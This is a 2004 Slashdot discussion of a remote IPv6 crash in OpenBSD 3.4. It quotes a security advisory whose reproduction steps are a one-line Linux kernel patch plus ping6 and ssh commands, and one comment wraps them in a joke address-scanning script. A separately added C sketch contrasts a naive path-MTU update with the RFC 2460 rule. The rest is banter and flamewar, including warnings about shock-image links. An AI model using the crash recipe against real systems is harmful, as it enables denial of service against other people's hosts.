Remotely Crash OpenBSD
*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.
I think it's time to upgrade to windows.
I am defenseless. Use your button. Mod me down with all of your hatred.
Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?
--
Society has traditionally always tried to find scapegoats for its problems. Well, here I am.
I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...
No, in order to perform an attack on an OpenBSD box with this vulnerability you need to patch a Linux Kernel or roll your own network stack.
Join moola.com, play games to earn money.
I noticed this a while ago. To fix the problem, it is believed that openbsd current is not vulnerable.
Yes, the attacker needs to modify their kernel to send out the specific packet (from what I quickly read)
RTFA. you need to patch your kernel in order to EXPLOIT it, not to be exploited.
ps: it's only a 2 line patch to one file.
I believe that you must roll your own Linux kernel or network stack in order to send the (correct? bad?) commands that cause openBSD's crash to occur.
Open Your Mind. Open Your Source.
Why would you patch a Linux kernel for a BSD problem? That's like patching Windows due to a linux problem.
Help Brendan pay off his student loans
Actually you need to patch the linux kernel or write your own network stack to DO the remote attack against an OpenBSD box.
At least that's the way I read it.
chown -R us.
I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata page.
What's a sane admin to do?
Maybe the next time Bashdork reports the new evil IE vulnerability that allows my desktop wallpaper to be changed by a hacker in Romania I'll see a quote like this one. "To quote [whomever], head of [whatever] at Microsoft, it's just a crash".
I'm sure.
No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.
"People that quote themselves in their signatures bother me" - athakur999
RTFA. You need to patch the linux kernel to get its network stack to send out the specific packet to crash openbsd.
Exploiting the bug requires patching the Linux kernel.
..or should this read "If you are running IPv6 on your OpenBSD install.."
Now, if you'll excuse me, I have backups to corrupt.
read. to cause the crash you need to use a remote system running the patched linux kernel
I believe that EXPLOITING (not patching) the vuln. requires patching your network stack (the post just assumes you are running Linux in true /. form)
ya know after all the depenguinator and "upgrading" your linux box to BSD articles lately... I should have some sort of witty remark to this... but sadly I don't.
"why don't you just slip into something more comfortable...like a coma!"
You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?
Remote openbsd crash with ip6, yet still openbsd much better than windows
/* we coulnd't care less */ //joro
Systems affected:
tested on openbsd 3.4
not clear about netbsd
freebsd not vulnerable
Risk: Medium
Date: 4 February 2004
Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/obsdmtu.html
Anything in this document may change without notice.
Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
and there is a listening tcp port.
quoting de raadt: "it is just a crash."
remote crash which screws the kernel.
unknown whether this may be exploited for code execution.
Details:
The problem is triggered by setting small ipv6 mtu and then doing tcp
connect.
How to reproduce:
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
Workaround:
It is believed that openbsd current is not vulnerable.
netbsd current also seems to have related changes.
check:
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet6/ip6_output.c
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet/tcp_output.c?sortby=date
Vendor status:
open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200
Georgi Guninski
http://www.guninski.com
Damn. And people say that Windows is insecure. Jeez.
(On the other hand, as everybody knows, IE is an integral part of windows and could never work on Solaris, HP-UX or Mac OS, just as it would be impossible to create a Windows version without IE, like WinXP-PE)
Programming can be fun again. Film at 11.
However, I guess patching a BSD kernel should work as well :-)
The Tao of math: The numbers you can count are not the real numbers.
Pardon my ignorance.. but do FreeBSD and OpenBSD use the same kernel? If they do, does that mean that this bug would affect FreeBSD as well?
Lord of the Binges.
With the attitude those guys have, it's almost as amusing to hear about an OpenBSD exploit as a WinXP one!
You should read before posting.
So if you patch YOUR kernel and/or roll YOUR own network stack, then you could be vulnerable to a remote attack.
No, your attacker has to patch his linux kernel or roll his own network stack in order to crash you. You don't have to do a thing. RTFS!
c++;
Great, now when I try and check the linked article and can't get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.
Hell, who knows, maybe this one is Google's fault too.
...my BSD is dying...
Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and an IPv6 network in the same place? I think I'd better stick to plausible worries like lightning strikes, seatbelt failures, and choking to death on my turkey dinners.
I was talking with some of my colleagues in network security this morning about the OpenBSD exploit and means by which future exploits may be avoided. One suggestion which was raised was that the OpenBSD 'ports' system may be to blame. After all, if you need to add packages on a BSD system, 'ports' must be opened, and when ports are open on firewall boxes, bad things happen. Debian's apt-get system for example does not require 'ports' to work properly, and therefore may be immune from this type of exploit. Is this a possible solution? I look forward to hearing the community's responses!
You appear to be missing the whole problem.
This is a problem with OpenBSD's IPv6 implementation where if you send bad data, it looks like sending something larger than expected, then the kernel will crap out on you.
Rolling your own kernel OR building your own network stack is what's required for the REMOTE host to send these bad packets to your system and crash it.
On an unrelated note, it's a little disturbing to see this as I just rebooted an OBSD 3.3 system to upgrade to 3.4, but then again, I don't run IPv6.
What I would say is most suspect is Theo's reaction "It's just a crash." You would hope someone who started a project to create the world's most secure OS would actually care there might be a problem.
"I use a Mac because I'm just better than you are."
No, the BSD has to patch the ATTACKERS IPv6 to crash THE packet linux victim ROLL YOUR OWN!
regarding the second paragraph...YOU HAVE TO BE KIDDING!
I would mod this FUNNY...not insightful.
> To quote Theo, 'it is just a crash.'"
Yes, just a crash. Because you know he was trying like mad to get a remote exploit out of it. Some bugs are a d0s and others are simply not exploitable. Not so hard to understand how people use the phrase, "just a crash", with a disappointed puppy dog look because they cannot get mad props for dissing on Theo.
As for the people who did not understand patching your kernel so you can exploit the bug on openbsd.
HA!
Please continue using windows and being an end luser.
I consider this bug to be like an interesting post. Georgi will just get karma from it. Nothing more.
After all, who needs a bug to d0s someone from the face of the earth?
His way was just more elegant.
Thanks, I feel like I was just promoted to people level.
Damn, and I was just getting used to being geek level
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I love how the SIXTH person to respond to this post with essentially the same information as the other five gets modded up. How much you wanna bet the posts ahead of his get modded down as Redundant?
the difference is they fix it in a timely fashion...
Kyle
http://www.unlogikal.net/
rofl, nice ;)
even better someone just modded it insightful, please stop before I spit the rest of my coffee over the monitor.
Ha ha ha, very funny.
Slashdot: Failed Car Analogies. Amateur Lawyering. Anecdote Battles.
Well, I guess Theo got hit by the reductionism bug...or perhaps what he means is "At least the system goes down rather than being compromised"
yet still openbsd much better than windows... cause we say so. What a dumb way of defending yourself, why brush off your bug by saying "At least we're not windows!". Why don't you own up to the fact that "Hey we found a bug, but since we're open source we can fix it right away"
There are days on this network where I wish the latest MS vulnerability was just a crash. 'member those great days? It may not even get reported because it would be such low key news.
Anyway, for this remote takedown to work, you also have to be running an IPV6 stack, right? At the moment that's a pretty small segment of techies.
Note: I am not an OpenBSD apologist... I am a Mac apologist.
-- The unsig...
(Moderators: The BSD ports system has slightly less than nothing to do with TCP/IP ports being open, closed or missing on firewall or other machines. It's just a homonym (no, it has absolutely nothing to do with gays).)
Money for nothing, pix for free
Stupid trolls.
Hey, but it's only a crash, nothing at all to worry about...
/* we coulnd't care less */ //joro
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
#!/usr/bin/python
import popen2, string

def cmd_execute(cmd):
    p = popen2.Popen3(cmd)
    p.wait()
    return string.strip(p.fromchild.read())

# kill everybody (joke: these are IPv4-style dotted quads, which ping6 and ssh -6 will not accept)
for a in range(0, 255):
    for b in range(0, 255):
        for c in range(0, 255):
            for d in range(0, 255):
                addr = '%d.%d.%d.%d' % (a, b, c, d)
                cmd_execute('ping6 ' + addr)
                cmd_execute('ssh -6 ' + addr)
The Linux kernel in question belongs to the attacker, you dumbshit.
OK, that just piqued my curiosity. I am very sorry it did, but it did. People, do NOT follow that link in the grandparent post. Just take my word for it. Don't. No amount of curiosity is worth seeing that.
Money for nothing, pix for free
But the Linux kernel is what needs to be patched in order to exploit the OpenBSD kernel. A program running on "out of the box" Linux, can't implement the attack.
good thing nobody uses IPv6 and never will! :-)
Who the hell modded this up? The ports system like apt-get make internally initiated connections to servers. They don't start listeners up. You can run your own internal mirror of either.
Not long ago there was an article about not only how ipv6 isn't needed, but that since it's 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?
I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? and if so isn't it trivial to avoid the same early mistakes in ipv6. Does this particular problem have an ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?
Does anyone have any insight?
WTF? I try to give a decent warning to the public and I get modded as flamebait? Either the moderators don't click on the links, or we have some real sickos here....
But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?
Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?
Flaming assholes and arrogant pricks we are, but even then a remote crash is the best you can do?
C'mon.
He was talking about having to modify a linux kernel in order to generate the traffic to crash the BSD kernel...
Thinking outside my Head
Besides, a remote crash is annoying, but it isn't a remote compromise. Besides it is limited to IP6. It will be more worrying when it is an IP4 remote compromise on a more common OS.
I didn't do anything, it was Guninski. I don't give a crap about OpenBSD.
I think what he means is "it's just a crash right now, don't bother me until you can show an exploit and have fixed it." It says right in the article they don't know if it will allow a system to be compromised, and it seems that until someone else checks that, he doesn't care. I was just saying that a crash might not be a crash, but Theo's attitude is a little lax in approaching the situation considering that they say right on bootup to OpenBSD the PROACTIVELY secure unix system. Not all that proactive when you don't take action to actually prevent a problem and just wait for someone to give you step-by-step how to compromise a system.
"I use a Mac because I'm just better than you are."
What am I missing here?
Enough good sense to RTFA, or at least properly fake as though you had.
LK
"Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
> I didn't do anything
Exactly.
mod -1 for being a troll post, openBSD is alive and well... and its not the linux kernel, its the BSD kernel you dumbshit.
Maybe you don't understand, but there has to be an attacker. You have to have a specific modification in the linux kernel of the linux machine (attacking machine) to successfully attack the openbsd machine (victim). Probably you could set up a FreeBSD machine, or even another OpenBSD machine to do the attack. Just a linux machine was used to attack in the example.
Did you even RTFA?
What would you rather Theo say? "OMG OMG OMG!!! It's a CRASH!!! Oh dear god! Quick, run around like headless chickens!!!!! Someone better get this patched pronto!!" or "It's just a crash." and get on with the patching?
Seriously, it's getting fixed. You think his reaction would change the pace with which the bug gets fixed?
Ok so why the hell don't they just add a few more octets onto an ipv4 address? afraid to rewrite a.b.c.d as a.b.c.d.e.f?
lol... I crack me up
So maybe you need to patch a Linux OS to get some help sending broken ICMPv6 packets, or maybe you just need to do creative writing to the Ethernet. But you could certainly get MS-DOS to let you do it, and presumably also Windows.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.
I think CowboyNeil needs to check his Linux using head before reporting on BSD ever again.
It isn't a lie if you believe it.
is http://www.uberpferd.de/ the link you're talking about? If so, it doesn't have a DNS resolution here. :( And I was looking forward to being grossed out.
Welcome to the infamous pain.jpg series. Now that your Internet virgin cherry has been popped, we can all continue on with our lives.
Perhaps you should read the fine print at the top of this page:
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
And again at the bottom of the page:
All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest (C) 1997-2004 OSDN.
Slashdot is not responsible for what people post here. If you can't live with it maybe you should go elsewhere. Moderation works most of the time.
Okay, okay, I misread the post. You can all stop flaming me now. I thought it said it required patching the Linux kernel _to fix_ rather than to exploit. In any case, it was only meant in jest, there was no need whatsoever for the mod slamming and flamefest.
And buffer overflows that get data that isn't crafted are "just a crash" as well.
Most Military grade security systems run on Windows 2000, and is the most secure certified operating system.
There seems to be a leak in slashdot's subspace containment fields - a post from a strange parallel universe leaked into this thread!
But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?
Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?
It's fine to have security as your focus. In fact, that's great. What turns me off is the attitude that OpenBSD is axiomatically more secure. The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code." And then they should look at how this bug got in there, and figure out how they can make sure that kind of bug doesn't happen again.
IMO they should also get rid of this ridiculous "no (well, one) (remote) (root-privilege) holes (in the default install) in the last 7 years!" business. It's just too confrontational; how can we help but think of them as another "team" trying to beat us at the security "sport"?
Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.
I don't want knowledge. I want certainty. - Law, David Bowie
I applaud what Theo de Raadt and company have done and are trying to do. Given the resources someone like M$ has to throw at this sort of thing (and their level of success) compared to the OpenBSD team, they've done amazing work. That being said, if Mr. de Raadt could do an attitude re-adjustment, OpenBSD could gain more of the respect it deserves.
Dear lord...
You seem a little bitter.
Are you making use of IPV6? While it is possible I don't really know many people that are, so perhaps you could just not use the IPV6 bindings for now until the problem blows over?
Welcome to the Internet. This is Slashdot. People post links to gross pictures here for you to click on and there is NOTHING YOU CAN DO ABOUT IT. No, really. I'm sure AOL would LOVE to hear about your problems with pee-pee poo-poo pictures on the Web. Why don't you grow a pair of balls and stop your whining?
A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
I'd find the OpenBSD crew's haughty "more secure than thou" attitude a lot more annoying if it weren't for the fact that their track record actually justifies it. The fact that you can still count the number of remote exploits using a two-bit register is pretty impressive.
Except it's not an exploit, it's a DoS ... that only affects people running IPv6, with a publicly accessible IP.
hehe beware the links. I was just as horrified the first time I saw the goatsx pic as a young slashdot noob.
Hardly..
a simple raw socket will do.
The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code."
It was fixed before you even heard about it. Get over yourself.
Haida Manga
Just a crash? Just a crash? Give me a break. If the machine goes down, you're hosed. How convenient.
What would the reaction be if s/OpenBSD/WinXP/g and the response was from Microsoft was "it's just a crash." Imagine. Oy.
Except it's not an exploit, it's a DoS ... and it's only a problem for those running IPv6 with a publicly accessible IPv6 address.
Yeah, there's a dangerous problem there.
God, the intelligence on Slashdot has certainly dropped in the past few years.
exactly what?
...IPv10 (IPX!)? 4 + 6... [woo lame version # advancement schemes!] then you get to put an "X" in the name and everyone upgrades faster... maybe we could even work in an XML basis; think of the interoperability!
Global symbol "$deity" requires explicit package name at line 2. - If only $scripture started "use strict;"
it runs on solaris cause its a donated site from University of Alberta.
a few months back child porn was posted and nothing was done
I've read a bunch of posts comparing this "possible" hole in OpenBSD to those in MS. There's NO comparison! I bet Theo and the OpenBSD developers are already working on a fix. Actually, they probably already have one. With MS, it takes much, much longer! And sometimes, the "fixes" that MS so-called developers come up with break something else.
You bastards!
yes, when I saw this and noticed people commenting on the "Securer than tho" stance taken, my immediate thought was
"Hmm, well if we have gotten to the point where people have to roll their own net stack or patch a kernel to bring an issue to the fore, then hasn't the OpenBSD project succeeded in its goal?"
I'm glad they fixed it..
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date&f=h
[alk]
The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.
You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.
For extra kicks, blind taste a Tawny against a Madeira.
Enjoy.
I have something in common with Stephen Hawking...
"Only one remote hole in the default install, in more than 7 years!" -openbsd.org
but a billion local holes in default install...
--- any post that takes longer than 20 seconds to write, isn't worth writing
Maybe it's not their attitude that is the problem.
I have made a mirror of the page, as it is becoming exceedingly slow.
|/usr/games/fortune
now, how many times does this happens to your favorite OS vendor and their favorite web browser???
from the openbsd CVS:
Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
Branch: MAIN
CVS Tags: HEAD
Changes since 1.81: +100 -18 lines
Diff to previous 1.81 (colored)
strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei
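The commit message above ties the fix to RFC 2460 section 5, last paragraph, and the advisory's Details section describes the trigger as a small IPv6 MTU followed by a TCP connect. As an added illustration (not OpenBSD's code or Guninski's), the C sketch below puts a path-MTU update that accepts a reported MTU of 68 beside one that applies the RFC rule, keeping 1280 and flagging a Fragment header; the struct and function names are hypothetical and the ICMPv6 message is constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IPv6 minimum link MTU (RFC 2460 section 5). */
#define IPV6_MINIMUM_MTU 1280u
/* Header sizes used to derive a TCP MSS from a path MTU. */
#define IPV6_HDR_LEN      40u
#define IPV6_FRAG_HDR_LEN  8u
#define TCP_HDR_LEN       20u
/* ICMPv6 Packet Too Big message type (RFC 2463 section 3.2). */
#define ICMP6_PACKET_TOO_BIG 2u

/* Hypothetical per-destination path-MTU state; not OpenBSD's real structures. */
struct path_mtu {
    uint32_t mtu;              /* MTU currently used toward this destination */
    bool     need_frag_header; /* include a Fragment header in every packet */
};

/* Constructed Packet Too Big message reporting MTU 68, the value the
 * advisory's reproduction sends (type 2, code 0, checksum left zero). */
static const uint8_t ptb_mtu_68[8] = { 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44 };

/* Return the Next-Hop MTU carried in an ICMPv6 Packet Too Big message,
 * or 0 if the buffer is too short or is some other ICMPv6 message. */
uint32_t icmp6_ptb_mtu(const uint8_t *msg, size_t len)
{
    if (len < 8 || msg[0] != ICMP6_PACKET_TOO_BIG || msg[1] != 0)
        return 0;
    return ((uint32_t)msg[4] << 24) | ((uint32_t)msg[5] << 16) |
           ((uint32_t)msg[6] << 8)  |  (uint32_t)msg[7];
}

/* Naive update: trust any smaller MTU the network reports. A value such
 * as 68 then flows unchecked into TCP segment sizing. */
void pmtu_update_naive(struct path_mtu *pm, uint32_t reported)
{
    if (reported != 0 && reported < pm->mtu)
        pm->mtu = reported;
}

/* Update following RFC 2460 section 5, last paragraph: a reported MTU
 * below 1280 does not shrink the path MTU below 1280; the sender keeps
 * 1280 and adds a Fragment header to subsequent packets instead. */
void pmtu_update_rfc2460(struct path_mtu *pm, uint32_t reported)
{
    if (reported == 0 || reported >= pm->mtu)
        return;
    if (reported < IPV6_MINIMUM_MTU) {
        pm->mtu = IPV6_MINIMUM_MTU;
        pm->need_frag_header = true;
    } else {
        pm->mtu = reported;
    }
}

/* TCP MSS derived from the path MTU. Returns 0 when the MTU cannot hold
 * even an empty segment; a caller must refuse that rather than use it. */
uint32_t tcp_mss_from_pmtu(const struct path_mtu *pm)
{
    uint32_t overhead = IPV6_HDR_LEN + TCP_HDR_LEN +
                        (pm->need_frag_header ? IPV6_FRAG_HDR_LEN : 0u);
    return pm->mtu > overhead ? pm->mtu - overhead : 0u;
}

/* Apply a received Packet Too Big message to a fresh 1500-byte path and
 * return the resulting MSS under either update policy. */
uint32_t mss_after_ptb(const uint8_t *msg, size_t len, bool hardened)
{
    struct path_mtu pm = { 1500u, false };
    uint32_t reported = icmp6_ptb_mtu(msg, len);
    if (hardened)
        pmtu_update_rfc2460(&pm, reported);
    else
        pmtu_update_naive(&pm, reported);
    return tcp_mss_from_pmtu(&pm);
}

int main(void)
{
    /* Naive policy yields an 8-byte MSS; the RFC 2460 policy yields 1212. */
    printf("reported MTU %u: naive MSS %u, RFC 2460 MSS %u\n",
           icmp6_ptb_mtu(ptb_mtu_68, sizeof ptb_mtu_68),
           mss_after_ptb(ptb_mtu_68, sizeof ptb_mtu_68, false),
           mss_after_ptb(ptb_mtu_68, sizeof ptb_mtu_68, true));
    return 0;
}
```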
This guy found a crash in qmail, too. I don't think he showed it was exploitable, so he doesn't win DJB's security guarantee prize. In fact I'm not sure DJB reacted to the news at all.
you would HAVE to be connected to the 6bone to get an ipv6 packet. Or have the attacker on your own network running ipv6 and trick you into becoming configured onto the same /64 prefix....not many of us have an ipv6 tunnel (thank you hurricane electric). So this affects very very very few people. you know who you are, and are patching now.
--jboss
The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.
OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.
Fixed? really? Could you point out on the errata page where this is even mentioned, let alone patched?
"I use a Mac because I'm just better than you are."
Which link we talkin about anyhow? I wanna see! lol
"our linux crashed your openbsd!"
If the same port cost $5 a bottle, would you care so goddamn much about drinking it?
If you think of going to the page linked by the grand-grand-parent, don't.
(... sigh, why do I even make the effort?)
I did out of curiosity
If you're curious, read this
DISCLAIMER : Even the text version might be highly offensive to some, but I hope that this will kill the curiosity of some people.
The link is one large image composed by multiple sub-images, there is (ROT13):
- one more picture I don't remember (and I WON'T go there again, once was twice too much)
And I can just agree with the parent
NO AMOUNT OF CURIOSITY IS WORTH SEEING THAT.
(But I know that your curiosity will win anyway)
Now, where can I get a mind-altering drug to forget what I just saw, that I just saw it and that I even remotely know of its existence?
I have discovered a truly remarkable proof for my post which this sig is too small to contain.
While possibly not a direct security threat, remote crash exploits are obviously highly disruptive and in today's networked economy, highly costly in terms of lost productivity.
While a crash exploit doesn't guarantee it, it usually means that a root exploit is possible.
Think about it: You got the machine to execute code it shouldn't have executed (or overwrite something 'way important it shouldn't have overwritten, or with a value it shouldn't have written.) This usually means you changed the program counter to some random value. That typically happens as a result of overwriting a return address by a buffer-in-the-stack overflow. Now if you can just get the program counter to point to code you supplied in the same packet, and put the right code there, you're in.
There are other ways this can happen (for instance: overwriting an index into a function table with an illegal value). But many of these similarly lead to root exploits.
A crash means you killed, not just a task, but the whole system. In a system as robust as BSD this usually means that the code that was corrupted by the exploit was running at a kernel permission level. So if you can take it over you can get it to give you any permission you want.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
"I have a nice port (Fonseca) sitting open on my bar at home."
I've had a bottle of '77 Fonseca buried in a cave in the Midwest since 1990. One day, when I'm old and grey and wet the bed, my son and I are gonna drain it together.
what is interesting is that current is not affected. very often when a problem is fixed in current but not in stable. why ?
theo hides some fixes. i do not know if it is to keep an advantage over the other bsd projects or linux, but when a problem is detected, they only produce a patch for stable if there is an exploit around or rumour of an exploit.
no exploit ? it gets fixed in current only.
and theo hides it under something like "reliability fix" or alike when if you check the patch it's really a buffer overflow or something very obvious.
so we got people running openbsd stable with patches that should know that if they want to keep with openbsd they should track current, not stable with patches.
this is hypocrisy. the other bsd projects not only do not do such stupid things but they have to keep an eye on theo patches just to find out.
stupid
i have been part of the openbsd project. so i know pretty well how it works.
I remember the days in the late 80s and early 90s when it was (which is how I was able to afford that case of Fonseca '77)... I was a pig in shit back then.
I have something in common with Stephen Hawking...
It should be amusing and rare to hear about these holes in ANY OS. OpenBSD should get more press than Windows for holes, after all openBSD has so few that you can safely assume the people using openBSD don't bother to pay attention, while those using Windows have to pay attention. Therefore we need extra effort to get the attention of OpenBSD users on the rare times it is needed.
Sadly it doesn't work that way. Windows users despite having lots (by comparison) of holes never patch, while openBSD seems to be reserved for only the paranoid who patch often.
Either way, openBSD deserves the attention they get. If I were to swear everyone who knows me would talk about it, even though most of them think nothing of swearing everyday (or so it seems). Once you build (like me) an expectation it is interesting when you violate it, even though you did something that is everyday.
Perhaps I'm missing something, but why would someone need to run ipv6 since the Internet is still not using it?
We are still running everything on ipv6. Now we have had a couple sites that we've had to move to FreeBSD servers due to the lack of SMP support in OpenBSD and needed the extra power. However, overall, I've had good luck with OpenBSD. It's the lack of support for SMP and other features that keep me from an extremely large scale deployment...
"The problem with socialism is eventually you run out of other people's money" - Thatcher.
"It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel"
Is it Linux or BSD? ; )
That guy is one of the best bug hunters in the industry. He and Rain Forrest Puppy should start a consulting firm.
Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
To quote Theo, 'it is just a wardrobe malfunction.'"
Cogito ergo sum: Rene Descartes, Discourse on Methode, Part 4
Reposted 'cause I could use the mod points.
What does "cogitoergosum" mean?
A "remote hole" doesn't have to just be obtaining root access. Being able to remotely crash a server is almost as bad. So no, they cannot boast.
Troll?!? It was humor, you insensitive clod.
a few months back child porn was posted and nothing was done
No, a link to child porn was posted and the post was modded down into oblivion, as is the system and the basis of the culture here at /.
No post, no matter how disgusting, offensive, or damaging to "national security" will be deleted from /.
If a site is publishing child porn, then the operators of that site should be held responsible for this, but as /. is not the publisher, nor did /. in any way encourage the posting of material of that nature, nor should you expect /. to take the unprecedented action of censoring postings based on the content.
If you have a problem with the posting you mention (I did not see that post myself, so I have no opinion of its content) then you should locate the URL of the offending material and take whatever legal action against that publisher is appropriate.
Just leave /. out of it! Read the FAQ if you still don't understand the concept.
Once again: comments will not be deleted because of content.
You got us. It was fixed about two and a half hours after you heard about it...
What I've been wondering is if anyone has read any of the literature regarding OpenBSD's methodology. I recall it being expressly mentioned that they would rather have the machine crash than have it rooted. Which is a good idea if you cannot risk a break-in. They try to break in, you crash, and now you're in a more secure state (off) than you were when they attacked you.
As a sysadmin of a college network, "just a crash" *really* helped me.
I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortunately a legitimate $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.
Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.
Just a crash, saved several boxes. By contrast, accessible linux machines, privilege escalation - root exploit. All over.
Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.
Honestly, I don't know what to tell you
you'll get many more crashes :)
you just need millions to test out bsd
http://bsd.slashdot.org/faq/com-mod.shtml#cm150
Slashdot does not delete comments based on their content (except in those couple of cases where the Secret Service imposed their will). If /. were to censor these posts then they take a big step onto a very slippery slope. On /., no censorship, no exceptions.
aaargh, my OpenBSD box is _really_ dead this time!!
I know I should have intense knowledge of all of this already... ;) but, how can openBSD use a Linux kernel, aren't they different beasts? Both Unix derived beasts but different nonetheless, or are they? Does openBSD actually run on the Linux kernel?
was your firewall would you rather have it rooted and used by one person/group or your box down and either:
internal network exposed, or
your business off the air
The Singularity is closer than you think
Quant
teh spoke or whack?
and if you're counting the number of remote root exploits, you can use a 2 bit register with a signed value.
When someone might yell at me, it has to be OpenBSD.
Mmmm. Tawny Port. Church got me into that one. Who knew the blood of Christ was so tasty?
a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...
...
yeah right
It's heartwarming to see that the ping of death lives on.
OMFG!! They do *NOT use the same kernel. Yes, both are *NIX derivatives, but no, they do not use the same kernel. Download OBSD and try it out. If you know Linux, then you'll see the differences and similarities real fast.
Anyone who equates deleting accounts that have no privileges and are unable to login with security is a moron. And commenting out IPv6 will not make the kernel any more efficient, it has no effect on performance at all. If you don't use IPv6, then you are already not affected. Try to think just a *little* bit once in a while.
Yeah fucking right!
No, it's not "just a crash", it's a "very easily executed DOS" that could be perpetuated indefinitely if the person on the receiving end wasn't aware of this exploit.
Theo: don't be so egotistical and elitist. Such attitudes lead to failure and defeat. History teaches us this.
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
If you bothered to spend a little time learning about OpenBSD and how things work there, you'd know how stupid your statement is. Every time *any* bug is found they go through the entire source tree searching for similar errors. Things like this have resulted in other fixes in the following days as a result. Just because he says "it's just a crash" when it's just a crash, doesn't mean it's not being taken seriously. You don't even know the context of the statement for christ's sake, wtf do you want him to say, "oh shit, we are 0wn3d, we give up, we're switching to linux cause it's so much better!"?
Wasn't the BSOD just a crash?
[SIG] Remember Mattel handheld games?
